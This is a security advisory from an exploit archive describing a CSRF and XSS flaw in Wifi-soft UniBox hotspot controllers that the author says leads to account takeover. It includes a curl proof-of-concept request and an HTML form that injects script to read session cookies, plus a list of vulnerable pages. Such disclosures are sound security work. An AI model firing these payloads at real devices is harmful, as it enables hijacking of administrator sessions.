what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Unibox Cross Site Request Forgery

Unibox Cross Site Request Forgery
Posted Feb 8, 2021
Authored by Kaustubh G. Padwad

Various Unibox products suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | b2ad463fe05cca881eb2aaa2883ee1d6b019cd543a3dfca94efb14e2e27c91e8

Unibox Cross Site Request Forgery

Change Mirror Download
=====================================================
Authenticated XSRF leads to complete Account Takeover
=====================================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated XSRF leads to complete account takeover in all
UNIBOX WiFi Hotspot Controller.
CVE ID:- Not -Yet - Assign
Author: Kaustubh G. Padwad
Vendor: Wifi-soft (https://www.wifi-soft.com/)
Products:
1.Unibox SMB
2.UniBox - Enterprise Series
3.UniBox - Campus Series

Tested Version: :Controller Model : U-50 | UniBox 2.4 (Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-008


About the Product:
==================
UniBox is one of the most innovative and reliable Hotspot Controllers in
the market today. You can install UniBox to manage any sized WiFi
network without having to replace any existing infrastructure. With
UniBox, you don't need any other solution for managing WiFi access. It
comes packed with features so just one box is enough to handle all the
functions of WiFi hotspots.

Description:
============
An issue was discovered on Unibox U-50 with version Unibox 2.4 and
poterntially respected all other devices. There is CSRF via
/tools/network-trace with resultant XSS due to lack of csrf token and
user input validation.

Additional Information
======================
The web interface of the SMB Unibox does not validate the csrftoken,and
the /tools/network-trace page does not properly sanitize the
user input which leads to xss, By combining this two attack we can form
the XSRF request which leads to complete account takeover using XSRF.

[Vulnerability Type]
====================
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================
curl -i -s -k -X $'POST' \
-H $'Host: 'IP-OF-Device' -H $'User-Agent: Mozilla/5.0 (X11; Linux
x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'
-H $'Referer: http://IP-OF-Device/tools/network-trace' -H
$'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length:
130' -H $'Connection: close' -H $'Cookie:
PHPSESSID=86i9fsqxxxxxxxxxxxxxx' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=86i9fsq22vi4vxxxxxxxxxxxx' \
--data-binary
$'port=lan&duration=600&noofpackets=100&sizelimit=128&filter=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&formsubmit=Start+Trace'
\
$'http://ip-of-device/tools/network-trace'

Vulnerable Pages to XSS :- http://xxx.xxx.xx.xx/authentication/list_users

http://xxx.xxx.xx.xx/authentication/list_byod?usertype=raduser
http://xxx.xxx.xx.xx/reports/dhcp_leases
http://xxx.xxx.xx.xx/go?rid=202
CSRF POC
--------

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://ip-of-device/tools/network-trace" method="POST">
<input type="hidden" name="port" value="lan" />
<input type="hidden" name="duration" value="600" />
<input type="hidden" name="noofpackets" value="100" />
<input type="hidden" name="sizelimit" value="128" />
<input type="hidden" name="filter"
value=""/><script>alert(document.cookie)</script>" />
<input type="hidden" name="formsubmit" value="Start Trace" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


[Affected Component]
/tools/network-trace and CSRF Vulnerabilities,

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Code execution]
True

------------------------------------------

[Attack Vectors]
once victim open the crafted url the device will get compromise

Mitigation
==========


Disclosure:
===========
07-JAN-2020 Discoverd the Vulnerability, and asked for conact details.
08-JAN-2020 Reported via contact form.
20-JAN-2020 Vendor responded and given a call
23-JAN-2021 Requested Update from Vendor
xxxxxxxxxxxx No Communication Recived further


[Vendor of Product]
WiF-Soft (http://https://www.wifi-soft.com/company/about.php)

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close